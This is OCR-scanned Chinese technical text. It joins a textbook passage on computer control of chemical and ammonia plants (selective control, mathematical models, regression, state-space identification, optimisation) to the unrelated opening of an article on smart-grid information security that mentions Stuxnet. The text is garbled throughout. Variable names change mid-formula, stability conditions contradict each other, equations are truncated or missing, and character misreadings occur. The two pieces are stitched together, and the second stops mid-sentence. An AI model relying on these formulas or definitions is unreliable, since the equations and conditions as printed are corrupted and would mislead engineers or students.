上述方案在工艺正常时能使混合气的氢氮比值稳定在适宜的 范围内。但当精制气成分太差而放空时,上述方案不能适应,会 出现氮量跟踪太慢的现象,造成氢氮比值越出合理范围,而使合 成工况恶化。因此,这里采用了选择性控制,通过判断氢流量的 大幅度降低等条件来选择正常控制还是工艺放空。如果是工艺放 空,则采用每个调节周期减少120m³ 的氮量(此数值是由实验确 定的),直至工艺恢复正常时为止。此后程序转入正常的氢氮比控 制。这就是合成氨系统氢氮比综合控制。 第五节 某化工厂电子计算机应用实例 一、分馏塔的前馈-反馈控制 其工艺流程如图17-17所示。 反应液的一循环液混合后(其组分为醋酸乙烯、醋酸、乙醛、 丁烯醛、乙炔等),进入DT-307 分馏塔。主要目的是分离醋酸乙 烯和醋酸。影响DT-307 塔稳定操作的主要干扰因素为加料组分, 而加料组分的改变,主要是由于第一循环液的过滤流量F₁的变化 所致。本控制方案选择F₁ 为前馈变量,控制对象为顶温 DT, 控 制变量为蒸汽量。相应的控制流程图如图17-18所示。控制框图 二、分馏塔的选择性控制 DT—304 分馏塔的任务是,分离DT—307 塔釜液中的 HAC (塔底)及VAC (塔顶)。工艺流程如图17-17所示。 该系统当保持顶温及塔底釜温在操作范围内时,中温只要不 超过允许的波动范围(87~93℃),则塔顶馏出物及塔底釜液均 可达到质量指标的要求。但当进料组分变化时,塔底釜温容易改 变,需要另行设定中温控制的设定值。这种情况下,用常规仪表是难以控制好的。为此,采用计算机选择性控制方案。控制流程图如图17 - 21所示。 当中温CT在允许的波动范围内时,选择器将选择由釜温 FT :调节蒸汽量,以保持釜温不变。 若中温CT超限,则选择器选择中温CT 调节蒸汽量。当顶温 DT和釜温FT 在正常情况下时,加中温衰减器,逐步减少中温, 以确保顶部质量。这样就构成了选择性调节系统。 三、工资计算程序简介 用计算机计算工资,只要将程序和有关信息输入到计算机 中,就可以很快从打字机上准确无误地把职工工资按班组顺序打 印出来,而且打印出班组各项小计、车间各项累计,直到为发放 工资方便而统计的各种货币的数目。例如一元 (YUAN) 的多少 张, 一角 (JIAO) 的多少张, 一分的硬币 (FEN) 多少个等等。 工资项目包括: (一)基本工资 (JB) 有几十种之多; (二)附加工资 (FJ) 有几种; (三)福利费 (FL). 按性别不同有两种; (四)夜班费 (YB) 是每月变动量; (五)事假扣除 (SJ) 是每月变动量; (六)病假扣除 (BJ) 是每月变动量,并须事先准备好 每人扣除时的比例(根据工龄确定),存入计算机备用; (七)房费扣除 (FF) 因冬夏不同(冬天包括暖气费); (八)托儿费 (TF) (九)代扣款 (DK) (十)实发工资 (SF) 将职工按班组顺序编号,每人占一个单元,其内容如图17- -22所示。每个班组的特征单元占外存一段。其中第一单元存放本 班组的人数以及起始序号。 本程序分变量输入及处理程序和工资计算程序两部分。前者 有对输入符号进行语法检查的功能,遇到错误则在电传打字机上打印出来。若无错误,则边翻译、造表,边将输入变动量一个一 行地打印出来供人核对。如确认无误,则启动工资计算程序。 第十八章 数学模型与最佳控制 用电子计算机控制炼油、化工生产过程,除要求有稳定可靠 的硬件 (CPU 及外围、外部设备)及严密完整的系统程序(操作 系统)之外,还必须有丰富有效的应用程序。应用程序的核心是 数学模型。数学模型与相应的程序是计算机赖以控制生产的依据, 它决定了计算机按什么规律处理生产数据,按什么方程式来计算 控制变量使之能有效地控制生产。数学模型及其相应的程序在计 算机控制系统中的作用如图18-1所示。不言而喻,电子计算机控 制工业生产的有效性和经济收益取决于所用的各种数学模型及其 相应的程序。 第一节 数学模型的意义和分类 描述受控对象输入量与输出量之间内在联系的数学关系式称 为该对象的数学模型。炼油、化工生产过程是由多个生产装置或 单元所构成的,它们都可有各自的数学模型。 从不同的角度可将数学模型分成不同的类型。这些类型都是 根据生产过程各自的特点来区分的。例如,针对连续生产的正常 运行、开停车以及某些间歇性生产过程等可将所适用的模型分成 如下三种。 1. 数量关系的模型 把生产过程控制中的基本关系用数量 表达式或数学方程式来描述。炼油、化工的连续生产过程的正常 运行都是采用这类模型。 2。逻辑关系的模型 过程控制的基本关系是用逻辑表示式 或用网络图描述的。控制机根据网络图或逻辑表示式,通过它的 逻辑运算、逻辑判断和“记忆”的功能来完成诸如自动开、停车 之类的操作。有时称为顺序控制。 3. 混合关系的模型 此模型的基本关系中既有逻辑关系又 有数量关系。它把适用于不同工况的若干数量模型按生产要求在 不同阶段进行切换。此类模型适用于具有严重非线性对象。如炼 油中的常压蒸馏生产方案的切换以及按一定要求升降温度的聚合 釜等控制。有时称为分批控制。 数量关系的模型按生产过程的稳定情况又可分为动态模型和 静态模型,这是一般的分类。静态数学模型是描述受控对象处于 稳态(又称静态)时其各输入变量与各输出变量之间的相互数学 关系。它可以由一组代数方程或更复杂的方程来描述。动态数学 模型是受控对象处于动态过程中各输入变量与各输出变量之间的 相互数学关系。此时,其输入量与输出量一般都是时间的函数, 它可以由一组微分方程、积分方程或积分-微分方程来描述。如 果其动态过程可以用常微分方程来描述时,则此对象称为集中参 数对象。化工生产中所用的连续搅拌槽反应器即属此类。反之,如果其动态过程必须用偏微分方程来描述时,则该受控对象称为分 布参数对象。如管式反应器、合成氨中的变换炉、合成塔等皆属 此类。 静态数学模型在炼油、化工生产中占有相当的地位。众所周 知,炼油、化工生产过程和装置都是通过静态分析进行设计的。 这一方面是为了简化问题,另方面也是基于这样的假定:稳态系 统常相应于过程的最大利益。所谓最佳稳态设计就是按一定的处 理能力(生产负荷)、 一定的原料组分、成品或半成品的质量要求 以及一些设备的安全限制(如压力与温度范围)和能源的消耗等 因素予以综合平衡而确定一组操作运行的控制点。当以上各因素 (系统的输入量)均稳定于其设计值附近处,则系统运行于所设 定的控制点时就可获得最大的利益。然而, 一旦某一或某些输入 量明显地偏离于设计条件,并相对稳定于该处时,则就必须按静 态模型进行计算而重新设定并调整各控制点,使系统有相应的最 佳收益。 通常,炼油、化工生产过程是一个多输入、多输出的系统, 常有某些输入量(如供料的组分等)呈幅度较小而时间相对短暂 的波动,为维持系统的相对最佳稳态运行,则需仰仗动态模型进 行有效控制,以抵消干扰的影响。在新的最佳稳态控制值未给出 之前,就需由动态模型维持当时的稳态运行。另一方面,为使控 制更为有效,也需借助动态模型使系统从原来稳态到达新的最佳 稳态的过渡过程损失最小。 综上所述,可知在炼油、化工生产过程中为达到最大收益, 动态模型与静态模型这二者是相辅相成的。 需要提及的是,使用稳态模型是有条件的。这个条件是: Tμ>Tm 或 Tμ<Tm 式中 Tg—— 干扰(或输入量的波动)进入系统的时间间隔; Tm 干扰进入系统时,系统达到新稳态所需的时间。 当 Tg>Tm 时,系统有足够的稳定时间可施行静态最佳;而当 Tg<Tm 时,不是由一般炼油、化工对象所具有的超低频特性本身将此高频干扰滤平,就是由动态模型予以镇定。在此两种条件 下,可认为工艺过程本身基本上是稳定的,可建立静态模型并施 以最佳化控制。当 TR=Tm 时,则就不能施以静态最佳化。这就是说,在系统尚未达到相应 于前一个扰动的稳态之前,就可能又有新的干扰进来,则系统决 不可能长时期达到稳态而是经常处于动态过程之中,最佳稳态控 制也就失去意义。此时,只能考虑把扰动视作输入的动态最佳 化。显然,对于生产过程本身不稳定的装置,借助于电子计算机 来获取最大的收益将更为困难。 第二节 数学模型的建立 建立数学模型的方法一般有如下三种。 一、通过工艺理论分析建立数学模型 即运用对象的物理、化学等方面的规律和内在机理的分析和 计算,确定各变量之间的函数关系和数学模型。对于炼油、化工 生产过程而言。主要是以下三个步骤: 1. 从化学工程的基本原理出发,藉助于对单元过程的基本 分析,如化学反应动力学、流体力学、传热、传质等方面的基本 分析,建立相应的物料平衡和能量平衡关系式; 2. 确定进行最佳设计或控制的目标函数(通常是产量或收 益); 3. 寻找目标函数与操作变量及影响因素之间的函数关系, 确定一系列与约束条件或限制相联系的方程式(这些约束或限制 是诸如质量指标、触媒的活性、设备的负荷能力、传动设备的功 耗以及安全极限等因素)。 对于一些复杂的炼油、化工生产过程,用工艺机理分析建立 数学模型,目前仍是一件较难的工作。其中常常要作一些简化的假定。此外由于一些工艺数据尚不完备和不准确,或者其本身是操作条件(如温度、压力等)的函数,或随时间而变动(这些数据包括触媒的活性、反应速度平衡常数及传热、传质系数等),这 就影响了模型的精度和有效性。特别是炼油、化工生产过程,由 于广泛采用热量回收措施和物料的再循环,从而构成了内部交错 反馈,导致某些因素或变量互为因果。此外,在炼油、化工生产 过程中,还会产生大量的副反应。由于以上原因,使得通过理论 分析、计算来建立数学模型的工作更为困难。尽管如此,理论分 析方法就其实质而言,它是从过程内部规律出发,去探索各因素 之间的相互关系。这对于确定数学模型中哪些是主要因素,应予 重视;哪些是次要因素,或可以忽略;以及确定各因素之间的相 互影响的形态(即决定模型的结构形式)等方面,仍有一定的作 用。因此,为了建立有效的数学模型,对这种方法也应给予一定 的重视。 二、通过生产现场的实地测试获取模型 这种方法的实质是突出某一或某些因素的影响,然后通过实 测数据分析(常用最小二乘法或多元回归方法),常凭经验判断 模型状态以获取模型。显然,这是一种从“宏观”角度予以概括 的近似方法。就获取模型而言,是一种较为简便且有一定的工程 实用价值的方法。然而,由于是以有限的测试数据来概括和近似 描述实质上很复杂的受控对象,因此就往往掩盖了各变量之间的 内在联系。在某些情况下,不是方向错误,就是混淆了一些因素 本身的物理意义及其之间的相互关系。因此,这种方法对于具有 明显非线性以及具有多个稳态“峰谷”的对象常常失效。 三、理论分析与实测数据的分析相结合获取模型 这是将上述两种方法有机地结合,互相取长补短,因而是一 种较好的方法。通常是通过认真的理论分析来确定模型的结构, 然后进行重点测试,并通过对测试数据进行有分析、有根据的综 合,以确定模型中各因素的系数。这样,建立的数学模型就较为 实用、有效。 进行理论分析的方法一般是这样的: 首先根据物料和能量平衡等关系得出理论模型。其一般形式为 输入-输出=积聚 对于稳态模型,即积聚项被考虑为零。对于动态模型,则须 考虑积聚项。 根据物理、化学基本原理推导出来的方程式, 一般情况下可 能是一组变系数的非线性偏微分方程,得不到分析解。这就需要 加入一些假定、限制和简化,并经过数学处理,将其简化为一组 定系数线性常微分方程,则可得出分析解。 在炼油、化工生产过程中,不少生产流程都包括多个不同的 单元装置,而且各单元装置之间互相影响。故须首先就各装置单 独建立各自的有关平衡关系,然后利用动态平衡关系,将有关方 程式衔接起来以导出总体模型。 当生产过程是一个分布参数对象时,例如一个非等温管式反 应器,在管内的反应物沿管内轴向有明显的浓度与温度梯度。处 理方法可如图18-2所示,用多个搅拌槽反应器串联,来表示管式 反应器。对这N个反应器的每一个,都列出物料和能量平衡关系 式,经处理后得出N 组线性常微分方程,从而简化了问题。 得出理论模型后,其中各系数有待用实测数据加以验证,必 要时亦须修改部分结构,以便更好地与实际对象特性相吻合。这 就是下一节所要介绍的模型识别与参数估计。 第三节 模型的识别与参数估计 根据受控对象(或系统)的输入与输出实测数据,找出其输 入与输出之间的数学关系式,以使得用这一关系式对任何一种 (或可能的一种)输入,都能够及时预测受控对象(或系统)的 输出。这就是模型识别。 在模型识别中,当模型的结构已通过理论分析等途径预先确 定,而仅是藉助所收集的实测输入、输出数据来确定模型中的各 项系数时,则称为参数估计。如果连模型结构也是未知或需重新 确定,则属于模型识别。 根据获取实测数据的途径,而可将模型识别和参数估计分为 离线识别与在线识别。离线识别通常是强行改变待识别对象的某 一或某些输入,以在输出中突出其影响分量,亦即增大其信噪 比,从而能较为有效地识别模型。 一般是用最小二乘方法或多元 回归分析方法,对实测数据进行处理,求取模型。至于鉴别所得 模型是否有效,尚需设立一个目标函数,以判断模型符合于实际 对象的有效程度。 在线识别是根据装置正常运行时所收集的输入、输出数据, 按加权递推最小二乘方法来识别模型。由于在输出信号中,分不 清某一或某些输入的影响分量,从而使识别的有效性大为降低, 致使这种方法目前尚朱得到实用,它作为自适应控制的中心问题 仍有待解决。 本节着重介绍离线识别模型的方法。 一 、静态模型的识别与参数估计 静态模型识别,就是寻找当被识别对象处于动态平衡时,其 输入与输出之间的数学关系式。它包括两方面的内容, 一是要确 定模型的结构,即确定有多少个自变量与因变量、这些变量在模 型中的形态,是线性还是非线性,以及何种形式的非线性;二是 确定模型中各变量的系数。 炼油、化工生产过程的静态模型识别,基本上是通过理论分 析或经验预先确定模型结构,然后据此按因子正交试验,施加人 为扰动, -以确定模型的系数。这种安排对于一般是大型、连续生 产的炼油、化工过程,是基于以下两方面的考虑:其一是可减少 待试验因子的个数,侧重于测试主要因子的影响,这对费时费力的静态测试而言,就大大减轻了工作量,对正常生产的影响也可 减至最低的限度;其二是可减少统计分析方法处理试验数据的盲 目性。下面就线性模型与非线性模型的参数估计作一些概述。 (一)线性模型参数估计的回归分析方法 在生产过程中,由于各种复杂因素的作用,常需借助于回归 分析方法,确定其变量之间的定量关系。回归分析的任务是: (1)从一组数据出发确定这些变量之间的定量关系式; (2)对这些关系式的可信程度进行统计检验; (3)从众多的输入变量中,判断哪些变量的影响是显著 的,哪些是不显著的。 被确定的定量关系称为回归方程或预报方程。这里,只介绍上述 第一项是如何解决的。 已知输出变量y 和输入变量x₁ 、x₂ 、 ……xm的n 组采样值: 要确定下面关系式的各系数: y=bo+b₁X₁+b₂x₂+……+bmXm (18-1) 根据上面关系式,由统计学上称之为因子的xi,xa……,Xm; 的 一组采样值,即可算出输出变量y 的一个估计值yi: yi=b₀+b₁X₁₁+b₂Xz+……+bmXmi (18-2) 将此估计值与y的实测值y:之差记作0i: 0;=yi-yi (18-3) 要求选取一组 bo,……,bm, 使对已知的n 组采样数据而言,由(18-3)所得的偏差O;的平方和为极小: (二)非线性模型参数估计 非线性模型参数估计有两类, 一是只要经过简单的变换,就 可将原来的非线性问题化为线性模型,然后用线性模型参数估计 办法求解;二是不便化为线性化求解的非线性参数估计。第一类 非线性模型参数估计可举例说明如下。 设一模型为: y=A(x-1)B (18-8) 其中, y 、x 是输出与输入变量; A 、B 是二个待求的未知参 数。 对(18-8)式这类型式的非线性代数方程,若在其两边取对 数就得到: lny=lnA+Bln(x-1) (18-9) 当令: y'=1ny,b₀=InA,x'=ln(x-1),b₁=B, 并代入(18-9),则得到象(18-1)式那种型式的回归方程,就 可按前面所述求解。 第二类是属于非线性回归估计问题,它一般需要解决如下三 个问题。 1。如何选择回归估计中的目标函数。对不同的方程要求有不 同的目标函数。常用的目标函数有两种。第一种是二次型目标函数。 2. 非线性参数估计往往导出一个非线性方程组,解这个方 程组需要采用一定的计算方法。常采用求J(β) 的极值方法。 这就归结为参数估计的最优化问题求解,其求解途径一般有间接 最优化(或称解析最优化方法)与直接最优化方法,后者实质上 在β各分量的取值范围搜索求最优解。 解析最优化的基本原理是利用微积分中一定理: 一个光滑的 函数取得极值的必要条件是在极值点上函数的一阶偏导为零。因 为是必要条件,故此法获得的只是极值点。不一定是最优点, 一 般情况下还要在一切可能的极值点里选出一个最优解来。求最优 解的办法有如下几种:最速下降法,共轭斜量法,高斯-牛顿法, 拟线性化方法以及BFS 变尺度方法等。 3. 对于同一个模型方程(回归方程)用几批试验数据来估 计回归系数时所得的结果在数值上不会完全一致。如何确定这种 不一致是由随机误差所引起的,还是子样间有显著差异,这涉及 到统计假设检验问题,这里从略。 二、动态模型的识别与参数估计 同样,动态模型的识别也包括这样两方面的工作:首先要了 解模型的结构,亦即得悉动态模型的微分或差分方程表达式,并对各类模型从数学上归结为几种典型的型式;然后是安排试验, 采集输入、输出数据,对微分或差分方程中的参数进行估计。 对于线性系统,不论其输入、输出的个数,其动态方程可表 达为下述形式: X(t)=A(t)X(t)+B(t)u(t) 状态方程 (18-11) Y(t)=C(t)X(t) 观察方程 (18-12) 其中 X(t)—— 状态变量,是n×1 矢量; u(t)—— 控制变量,是m×1 矢量; A(t)—— 系数矩阵,是nxn 阶时间函数矩阵,这对应 于时变系统,当其各元为常数时,则对应于 定常系统; B(t)—— 系数矩阵,是n×m 阶函数矩阵; C(t)- -观察矩阵,是p×n 阶函数矩阵; Y(t)—- 观察变量或输出变量,是P×1 矢量。 模型参数估计主要是估计以上系数矩阵的各元。 (一)线性对象的动态模型识别与参数估计 线性对象的模型识别分成以下几个步骤:收集数据;求取对 象的脉冲响应和阶跃响应或频率特性和传递函数;建立近代控制 论中描述动态特性的规范形式——状态方程。 1。采集数据 最直接的方法是记录正常运行中对象(或系 统)的输入、输出数据,然后加以分析计算,但其缺点是难于得 到充分的动态信息。最常用的采集数据方法是在正常运行的对象 (或系统)的输入端人为加千扰,以强行突出其影响。 一般常用 的人为干扰信号有以下几种。 (1)脉冲信号 在充分短的时间内输入一个充分大的信 号,它近似于一个理想的脉冲,其输出响应就是对象的脉冲响应 函数, 一般记作g(t) 。 炼油、化工系统由于常具有超低频特性,其对脉冲信号的响应极微而不予采用; 一般是采用加一个近似矩 形方波的干扰,它相当于正、负两个阶跃信号。 (2)阶跃信号 在对象处于稳态时,在其输入端突然改变阀门开度,然后记录输出响应,所得的是对象阶跃响应函数,记 作h(t) 。 加阶跃扰动是炼油、化工系统普遍采用的一种较为行 之有效的方法,为了数据可靠,应注意选择信号的幅度并须在测 试过程中尽力排除其它干扰。 (3)正弦信号 强迫被测对象作与输入信号同频率的振 荡,记录输出信号的幅值及与输入信号之间的相位差,以获取对 象的频率特性。其优点是抗干扰性强,但由于试验时间较长且要 求专用设备,目前已很少采用。 (4)伪随机噪声信号 这是六十年代发展起来的一种方 法,比前几种方法有明显的优点:抗干扰性很强,获得同样信息 量对正常运行的干扰程度最低。它主要是采用二进制伪随机序列 来构造伪随机信号。这个伪随机序列具有如下三个特征:①在序 列中的+1与-1出现的次数几乎相等。②若干个+1或-1的个数 连在一起组成一个“游程”,其中的+1或-1的个数称之为“游 程”的长度。可以看到, 一个周期中,长度为1的“游程”占其 总数的1/2,长度为2的“游程”占总数的1/4,……。在同样长 度的所有“游程”中,+1的“游程”与-1的“游程”约各占半 数。③这个随机序列的自相关函数在原点最高,离开原点时迅速 下降。显然,具有上述特征的伪随机码可方便地在计算机上用程 序或移位寄存器来实现,很适宜为炼油、化工系统所采用。 2。用伪随机码识别对象的步骤 (1)估计对象(或系统)的时间常数(即持续时间T,) 和 截止频率。 (2)选择伪随机信号。它应满足:①伪随机码的周期(指 一个周期中所包含的基本电平的个数)必须大于对象的时间常数; ②一个基本电平时间T(即代表+1或- 1电平的时间)必须大于 截止频率对应的周期, 一般取基本电平时间等于2~5倍截止频率 周期长。 (3)根据对象的允许限度确定基本电平的幅度。 一般,电 平的幅度大些则抗干扰性强些,但可能干扰正常生产,应在其响 应能被检测的基础上尽量压低幅度。当提高幅值受到限制时,可 适当加宽电平的持续时间r, 但电平愈宽,伪随机码的自相关函 数与理想的脉冲差别愈大,可能降低精度。因此,确定电平幅度 和宽度时要权衡利弊。 (4)由计算机连续发送伪随机码叠加在某稳态的输入值 上,码为-1送- a, 码为+1时送a, 同时记录对象的输出值。 据此,可以算出输入与输出的互相关函数,而伪随机码本身的自 相关函数也易于得知,从而可求出对象的脉冲响应g(t)。 3. 根据所收集的测试数据求取对象的传递函数或脉冲过渡 函数或阶跃响应函数亦或频率特性。其办法也是先定受测对象的 阶数(即确定模型结构),然后按最小二乘方法求出相应的差分 方程或微分方程,或直接求传递函数矩阵与频率特性。经典的调 节理论对于这些求法及其相互转换已有详述。 4. 根据以下定理,将所求得的差分形式的动态方程化为状 态空间的动态方程。 定理:已知线性动态特性的差分形式为 yx+a₁yx-i+a₂Yk-2+……+anYk--n=b₁Uk-i+b₂Uμ-₂+……+bnUk-n 引进状态变量Xv:可变换为状态空间的动态方程,即 状态方程: X₄=φ*Xk-i+Tun-1 观察方程: Y,=H*X, 其中: K 表示时刻 tr, 在单输入-单输出系统,y. 和n 都是数量, 分别表示t 时刻系统的输出和输入值。其它符号定义为: H*=(1,0,0,…0)¹ (二)非线性对象的识别 这是一个目前有待解决的问题。下面概略介绍的是:模型结 构已完全清楚且初始状态也常看作是一些未知的参数,识别问题 就归结为确定表达式中未知系数。 非线性系统的动态特性可用如下的状态方程来描述: X(t)=f(X(t),P,u(t),t);X(t₀)=d (18-17) 式中 X(t)——n×1 的状态矢量; u(t)——q×1 的控制矢量; P. -m×1 未知(常量)参数矢量; f ——一个n×1 形式已知的矢量函数; t—— 时间变量; d—n×1 的初始状态矢量。 尚可以适当选择状态矢量,使得过程的输出用状态和控制矢量的 非线性函数形式模型计算出来 Y=(X,u) 其中:Y是1×1(1<n) 矢量,也是模型的输出矢量。 为了估计最佳参数矢量P和初始状态矢量d 的数值,必须建立 一个目标函数。模型的输出Y 可以通过一个数量同样函数J 与对 象的输出Z 作比较。通常, J 表达了在to<t<t₁ 时间区间里,给定输入u(t) 条件下,模型的输出与对象输出之差的一个积分: (18-18) 一般H 取误差 (Y 和Z 之间的差)矢量的平方和形式。P 、X 取不同的值, J 的大小不同。将J 看作是 P 、X 的复合函数。求 最优 P* 、X* 也就是求J 的极值问题。求J 取得极值点的必要条 件是J 对(P、X) 在该点上的梯度为零,只要能求出丁的梯度(如 何求是较繁冗的、从略),就运用诸如最速下降法等作参数估计 了。 第四节 最 佳 控 制 一个控制系统能使某些性能指标达到最大(或最小)则谓之 实现了最佳控制。显然,对于炼油、化工生产过程,常规调节系 统不可能提供最大的经济运行效果,必须研究一些新的控制策 略。它们是:1.最佳化:它是根据已经识别的数学模型施以最佳 化运算而力求最好结果;2.自适应控制:其中过程特性是未知的 或经常变动的,须在线交替进行模型识别与最佳化运算以期特定 的目标函数达到最大(或最小),这是现代控制理论中有待发展、成熟的一个重要分枝。本节只概述模型已知的最佳控制系统设计 方法。 视生产过程是否平稳,最佳化分两种:稳态最佳化和动态最 佳化。当生产过程能长期平稳时,稳态最佳化仅涉及运行的控制 点,所得的最佳运行工况可由常规控制来维持。诚然,如能由动 态最佳控制系统来维持或用以追踪控制点的更动则可使动态损失 最小。当过程从一个时间到另一时间的工况是更动的,例如程序 升、降温或常压蒸馏塔与催化裂解装置的生产方案的变更,则对 每次更动都必须算出新的最佳给定值。 如过程在整个时间内是处于动态变化之中或从一个稳态变到 另一稳态的过程也必须考虑的话,则应考虑动态最佳控制。 一、静态最佳化 静态最佳化一般具有三个要素 1. 确定最佳化变量; 2. 最佳化目标函数; 3. 约束条件。 以上三者都是通过数学模型相关联的。对于炼油、化工生产过 程,常取产量、利润、成本、质量等指标为目标函数;其约束条 件一般包括最大与最小功率、阀的行程与流量、积存容量、压力、 温度及质量指标与设备的安全极限等限制。 常用的最佳化方法是:线性规划和非线性规划。如性能指标 (或目标函数)是被控变量的线性代数函数,且约束也是这些变 量的线性函数,则线性规划是寻求最佳值的实用方法, 一般采用 单纯形法来求解线性规划问题,其解常在隅角处,也就是说常靠 近某些约束条件。 当代数方程组的非线性并不严重时,则可利用非线性规划来 求解,特别是在隅角处求解。另一种方法是用数个分段线性方程 来近似非线性方程,每段都用线性规划求解;或者在运行点把目 标函数线性化然后再最佳化,如此交替进行线性化与最佳化直至 得到最佳解为止。其详细过程叙述如下: 已知 N 个自变量X;(j=1,2,……N),M 个因变量Y;(i=1, 2,3,……M) 以及一般形为 P=f(X;,Y;) 的目标函数和形如 F(Xj,Y;)=0 的数学模型。其中目标函数及各约束方程既可是非线性的,也可 是不可分离的。要求在满足下列条件: MCLL₁≤Y;≤MCUL; MCLL₁≤X₁≤MCUL; 下使目标函数达到最大(或最小) 其中 MCLL;—— 对Y;的约束下限; MCUL;—— 对Y;的约束上限; MCLL;——对X;的约束下限; MCUL;—— 对X;的约束上限。 求解: 各自变量的起始点或初始位置均由输入提供,而相应的各Y 值有待计算。将初始位置表征为X; 及Y;的各初始值的矢量: (二)随机性最佳控制系统 由于实际控制系统总承受随机干扰,因此应该把滤去了干扰 的状态变量作为反馈的依据。为此,应考虑加进一个状态滤波器 构成随机性最佳控制系统。用了状态滤波器可使最佳控制不受或 大大减少随机干扰影响,从而使系统的性能更臻于完美。 设离散型随机线性系统的状态方程与观察方程为: X(k+1)=φ(k+1,k)X(k)+W(k) Y(k)=C(k)X(k)+V(k) 第五节 局部最佳与总体最佳 现代化炼油、化工生产流程的特点,是由大容量单机组串联 而构成一个总体。由于广泛采取热量回收(半自给热)措施,以 及物料的循环使用和全厂性公用工程负荷能力的约束,使这个总 体前后各环节都互有牵联。此外,由于各设备或机组的设计富裕 度不一,以及实际运行条件(诸如由供料组分的变迁、触媒性能 的相差等非操作原因所引起的)与设计条件的差异而造成各环节 负荷能力有所涨落,如此种种,就获取最大产量而言,都导致在 串联的生产流程中出现薄弱环节。因此,每个设备或装置的最佳 运行(局部最佳)并非意味着总体最佳。 现以日产一千吨氨的大型合成氨厂为例,说明整体最佳与局 部最佳的关系。 合成氨厂整体最佳化的目标函数,应是氨产量最大而原料与 燃料消耗又最低。 氨产量最大这一目标函数,首先反映在合成塔应有最大的空 时得量。而氨产量最大与原料、燃料消耗最低主要反映在转化炉 与合成塔的效率上。而合成压力、新鲜气流量、循环气流量、进 气温度、氨分离器温度、合成塔主、副线流量、氢氮比、循环气 中惰性气体含量、放空量与新鲜气中甲烷含量等均将影响合成塔 的操作。不同工况下的氢氮比的合宜值就要根据这个目标函数, 由合成塔数学模型及最佳化程序来决定。然而最大的空时得量与 氢氮比都涉及其它各工序,故须逐一探索这些工序的局部最佳化 问题。 1. 一段转化炉 应决定最佳的水碳比和最佳的温度,以便得到最大的转化 率、最少的燃料气与蒸汽消耗,使炉子在设计的限值内运行,保 持触媒的合理寿命。 最高的转化率不一定对应着最大负荷,所以要根据整体最佳 来决定。非但如此,各炉管内部触媒的情况与炉子温度的分布影响到总管温度的波动与产气量的变化,有必要采取使温度均匀和 使负荷均配的控制方法。然而,转化炉的操作条件影响到烟道气 的热量,从而影响到二段转化炉空气的预热、 一段反应气的预热 和辅助锅炉的产汽量,涉及全流程热量的平衡,必须综合考虑。 2. 二段转化炉 应算出最佳的空气流量,以平衡出口气体中最佳的甲烷含 量,并提供合适的氢氮比。同时,空气流量的变化将影响触媒层 的温度分布与锅炉给水的温度,因而也影响到蒸汽平衡。 3. 高、低温变换 应控制蒸汽流量以获得最佳的变换率,并要顾及惰性气体放 空之间的最佳平衡,并使蒸汽耗量为最少。 4. 脱碳 应考虑最佳吸收与塔内最大气速之间的平衡,以及再生操作 的蒸汽消耗量。 5. 甲烷化 应选择最佳温度、空速与转化反应的权衡。 6。透平压缩机 应探索最大负荷与蒸汽消耗量的关系。确立蒸汽压力、温度 与透平真空度的最佳值。并给出最小喘振余度的操作指导。 总之,各设备、各工序按工艺指标均有各自的局部最佳问 题,其限制条件是安全极限及由工艺规范决定的边界条件。但是, 就整体而言,必有一些薄弱环节,故各局部最佳并非总体最佳。 二者之间的关系因能量回收系统的存在而更加复杂。 一个可能的 途径是,从合成出发,按蒸汽的产汽量动力消耗的平衡来决定最 大的负荷,通过氢氮比最佳控制、弛放气流量、氨冷器分离效率 和触媒温度分布等来求取最大的氨产量。
standards
智能电网安全--下 一 代电网安全 迎接智能电网新时代 曾几何时,电力作为现代文明繁荣社会的基础支撑,发挥了十分重要的作 用,电力技术也作为第二次技术革命带领人类进入了现代化大工业时代,成为工 业时代的显著标志。那么人类的下一个时代——信息时代的标志是什么呢?无 疑是信息技术及其广泛应用。工业时代的电力技术经历了从单台机组、单用户 时代向集约化、现代化大电厂、大电网的转变;信息时代的信息技术也正在从单 机、单应用向互联网、物联网、云计算等方向转变,二者是何其之像!与工业时代 相比,信息时代的一个显著特征就是智能化,社会的各个要素均具备一定的逻辑 推理和自动处理能力,具备一定的互联和沟通能力,而不再是被动的、简单的重 复执行一套动作。于是我们的社会将成为智能化社会,政府将成为智慧政府,企 业成为智慧企业,交通将向智能交通转变,医疗将向智能医疗转变,电网将向智 能电网转变,城市将向智能城市转变,地球将向智慧地球转变。美国未来学家杰 里米·里夫金提出的第三次工业革命的新模式,就强调了从工业时代向信息时 代转变的必由之路,即将互联网与可再生能源相结合,从而达到绿色、可持续、低碳发展的新型工业化之路。 关于智能电网,各国均有不同的理解角度和侧重点。欧洲侧重于用户的便捷 性、分布式电源和可再生能源接入的高效性。美国更注重供电可靠性和电能质量 提高、国家能源安全、应对气候变化和环境保护等。而中国则更加系统和全面,从发电、输电、变电、配电、用电、调度的电力系统全环节提高电网的智能化程度,建设运营一个坚强、安全、可靠、稳定、灵活的电网,为社会提供清洁、可靠、透明的电力, 应对资源环境问题带来的挑战,适应发电多样化的发展要求,满足多元化用电服务 的需求。中国国家电网公司在电网智能化“十二五”规划中,将发展目标定为“到 2015年,形成坚强智能电网运行控制和双向互动服务体系,智能电网效益初步显 现,国家电网智能化程度达到国际先进水平。”尽管各国家的侧重点不同,但是大家 公认智能电网具有信息化、自动化和互动化的特征,即电网是高度自动化的,与用 户高度的互动,可对各环节的信息进行采集、传输、处理、加工和反馈。为实现电网 的智能化,需要从各个方面对现行电网进行改造。在发电方面,包括有新能源和分 布式发电技术、储能技术以及电厂与电网的互动交易技术等。在输电方面,包括有 设备监测技术、状态检修技术、数字化勘测技术等。在变电方面,包括有智能变电 站、可视化运行、变电巡检等技术。在配电方面,包括有电能质量检测、配网自动化 技术等。在用电方面,包括有用电信息采集、需求侧管理、节能技术、市场分析、电 动汽车服务网络运营管理等技术。在电网调度方面,包括有电网实时监测与预警、 电网综合分析与评估等技术。这一切俱需要信息通信网络的支撑和信息技术的广泛深入的应用和融合。 信息技术的广泛应用具有双刃剑效应。电网越是智能,信息技术的应用越广 泛,信息安全的问题就越突出。由于电网的高度智能,电网的各基础设施将通过信 息网络逐步连接起来,电网设备的运行状态将被实时采集和集中存储起来,用户的 互动性又使得用户通过互联网可对电网运行数据进行必要的了解和处理,这一切 均可能对电网安全造成威胁。电网不可能与互联网完全隔绝,电网运行状态和设 备信息有可能被读取,因此信息安全是智能电网不可逾越的一道屏障。2010年9 月爆发的“震网(Stuxnet)” 病毒席卷了全球工业界,感染了全球超过45000个网 络,直接攻击了伊朗核电站并造成损害,也给部分国家的电力部门带来了威胁和破 